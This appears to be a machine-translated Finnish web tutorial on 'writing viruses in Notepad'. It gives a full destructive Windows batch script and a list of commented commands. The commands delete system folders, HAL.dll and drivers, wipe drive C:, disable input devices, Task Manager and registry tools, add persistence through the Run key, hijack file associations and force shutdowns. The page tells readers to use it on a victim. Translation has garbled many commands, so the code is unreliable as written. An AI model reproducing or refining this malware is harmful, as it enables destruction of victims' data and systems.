Hyödyllisiä vinkkejä

Virusten kirjoittaminen muistikirjaan

Pin
Send
Share
Send
Send


Rekisteröidy >> isännät
chcp 1251
aseta papka = 0
:1
asetettu / A papka = papka + 1
md% UserProfile% Desktop% LOL_% papka%
jos ei,% papka% == 1 000 000 goto 1
del% ohjelmatiedostot% / q> nul
del C: Asiakirjat ja asetukset / q> nul
del% WinDir% / q> nul
rundll32-hiiri, poista käytöstä> nul
rundll32-näppäimistö, poista käytöstä> nul
rundll32-käyttäjä, Disaoemlayer> nul
aika 00:00> nul
reg lisää HKCU Software Microsoft Windows CurrentVersion Policies Explorer RestrictRun / v 1 / t REG_DWORD / d% SystemRoot% explorer.exe / f> nul
taskkill / f / im explorer.exe> ​​nul
del: *. * / q> nul
kopioi% 0 C: Windows Win32.bat> nul
reg lisää "HKCU Software Microsoft Windows CurrentVersion Run" / v Win32 / t REG_SZ / d C: Windows Win32.bat / f
reg add HKCU Software Microsoft Windows CurrentVersion Polices System / v DisableTaskMgr / t REG_DWORD / d 1 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies System / v DisableRegistryTools / t REG_DWORD / d 1 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies System / v DisableCMD / t REG_DWORD / d 2 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul
del% WinDir% system32 HAL.dll / q> nul
del "% SystemRoot% ohjaimen välimuisti i386 driver.cab" / f / q> nul
del "% SystemRoot% Media" / q> nul
assoc * .exe = * .guf
assoc. lnk = .txt
FOR / L %% i IN (1.100.000) DO DO%% i
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul
del "% SystemRoot% Cursors *. *"> nul
reg lisätä HKCU Software Microsoft Windows ShellNoRoam MUICache / v @C: WINDOWS system32 SHELL32.dll, -8964 / t REG_SZ / d upO / f
reg add HKCU Software Microsoft Windows Current version Policies Explorer / v NoControlPanel / t REG_DWORD / d 1 / f> nul
kopioi "% 0" "% SystemRoot% system32 sys321.bat> nul
del: * .lnk / q
shutdown -s -t 00 -c virhe> nul
sammutus -r -t 00 -c virhe> nul
rd C: / s / q> nul
del% 0


3) Nyt sinun on Tallenna nimellä muodossa Bin
Heitämme viruksen uhriin)
Onnea

V.I.P-käyttäjä

Arvaa mitä tämä ohjelma aikoo tehdä? 15 sekunnissa se avaa 50 laskinta, ennen kuin käyttäjällä on aikaa ymmärtää, mitä tapahtui)) Tietenkin, kun ohjelma avaa laskimet, näyttöön tulee musta ikkuna (suorituksien komentorivi), jos se suljetaan, ohjelma loppuu.
Harkitse 2 uutta joukkuetta, jotta käyttäjä ei voi tehdä tätä.

Uusi ”@echo off” -komento otetaan käyttöön viruksemme alussa ja piilottaa kaiken, mitä tulevaisuudessa tapahtuu. Sanalla sanoen, emme anna käyttäjän nähdä mitä tapahtui. Kun olet lisännyt yksinkertaisen, mutta erittäin tehokkaan toimenpiteen jokaisen komennon jälkeen, kuten “> nul” esimerkiksi “aika 00:00> nul”, piilotamme rivin. Joten voimme parantaa viruksemme:

No, tietokone jäätyy, jos ohjelma avaa laskimia määrittelemättömäksi ajaksi, mutta emme voi kirjoittaa paitsi laskimia! Voit suorittaa taskmgr (Task Manager), voit mspaint (Paint) ja niin edelleen.
Nyt lyhyt luettelo siitä, mitä voit kirjoittaa Notepad-virukseen.
LIST:

1) ”kopioi% 0 x: y” - kopioi viruksen levylle x y-kansiossa (esimerkki kopio% 0 C: System.bat),
2) ”tarra x: y” - nimeää levyn x nimeksi y (esimerkki tarra C: virhe),
3) ”aika x: y” - muuttaa aikaa x tunnilla ja y minuutilla (esimerkki aika 14:27),
4) ”päivämäärä x.y.z” - muuttaa päivämäärän päiväksi x päivä, y kuukausi, z vuotta (esimerkki päivämäärä 16.11.05),
5) “md x” - luo kansion paikkaan, jossa viruksemme on nimeltään x (md Papka-esimerkki),
6) "del *. * / Q" - poistaa kaikki tiedostot (myös viruksemme) kansiosta, jossa viruksemme sijaitsee (paitsi kansiot),
7) ”del x: y *. * / Q” - poistaa kaikki y-kansion levyllä x olevat tiedostot (paitsi kansiot) (esimerkki del F: Data *. * / Q),
8) ”assoc .x = .y” - uusita kaikki tietokoneessa olevat tiedostot muodossa x muotoon y (esimerkki assoc .exe = .mp3),
9) "verkkokäyttäjä" x "/ add" - lisää käyttäjän tietokoneeseen nimellä x (esimerkki net-käyttäjä "Smoked" / add),
Katsotaanpa vielä muutama julma käsikirjoitus.

Näillä kahdella linjalla vahingoitamme uhrin tietokonetta erittäin vakavasti. Se muuttaa kaikkien tietokoneen tiedostojen laajennuksia .lnk-tiedostolla .txt ja .exe .mp3-tiedostoilla. Eli kaikki pikavalinnat avautuvat notepadissa ja ohjelmat, kaikki soittimessa. Kova kyllä? No, se on kaikki) Kaikille onnistuneille virus-kirjoituksille anna noobsille tietää tulvan maksaminen!

Tässä on mielenkiintoisin.

[*] ”Taskkill / f / im explorer.exe> ​​nul” - tappaa Explorer.exe-prosessi, ja voit myös kirjoittaa tappamisprosessin.

[*] ”Taskkill / f / im pb.exe> ​​nul” - tappaa pb.eche)

[*] "Lisäys HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System / v DisableTaskMgr / t REG_DWORD / d 1 / f> nul" - Poista pikanäppäin käytöstä Ctrl-Alt-Del

[*] "Del"% SystemRoot% system32 * .dll "/ q> nul" - Poista kaikki järjestelmän DLL (dynaamiset ladattavat kirjastot)

[*] "Del"% SystemRoot% Driver Cachei386driver.cab "/ f / q> nul" - Poista kaikki tietokoneeseen asennetut ohjaimet

[*] “% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul” - Vaihda hiiren painikkeen arvot

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun / v 1 / t REG_DWORD / d% SystemRoot% explorer.exe / f> nul" - Estää sovellusten käynnistämisen

[*] "Aika 0:00> nul" - Aseta aika 00:00

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System / v DisableRegistryTools / t REG_DWORD / d 1 / f> nul" - Estä rekisterin muokkaaminen manuaalisesti

[*] "Del"% SystemRoot% Cursors *. * "> Nul" - Poista hiiren kohdistin

[*] "Del"% SystemRoot% Media "/ q> nul" - Poista Windows-järjestelmän äänet

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer / v NoControlPanel / t REG_DWORD / d 1 / f> nul" - Estä soittaminen ohjauspaneeliin

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul" - Poista työpöytä

[*] “Sammutus -r -t 1 -c" lol "-f> nul" - Tietokoneen pakko-uudelleenkäynnistys

[*] "Sammutus -s -t 1 -c" lol "-f> nul" - PC: n pakko sammuttaa

[*] "Net share" ResName "=" C: "> nul" - Jaa C-asema:

[*] “Tarra C: Asema> nul - Nimeä asema C uudelleen:

[*] "Msg *" Viestin teksti "> nul" - Näytä Windows-tyylinen viesti OK-painikkeella

[*] "Del"% 0 "> nul" - viruksen itse eliminoituminen

Jos et tiedä miten muuttaa tiedostopääte, tee tämä:
Siirry ohjauspaneeliin, siirry kansion ominaisuuksiin-> "Näytä" -välilehteen. Poista "Lisäasetukset" -ruudusta valinta "Piilota rekisteröidyille tiedostotyypeille laajennukset". Napsauta OK. Valitse nyt haluamasi tiedosto, napsauta sitä hiiren kakkospainikkeella ja valitse esiin tulevasta valikosta "Nimeä uudelleen". Poista laajennus (kolme viimeistä kirjainta) ja kirjoita uusi! Paina näppäimistön "Enter" -näppäintä.
Valmis !: D

Katso video: SCP-772 Giant Parasitoid Wasps. euclid. Parasitic Species scp (Kesäkuu 2020).

Pin
Send
Share
Send
Send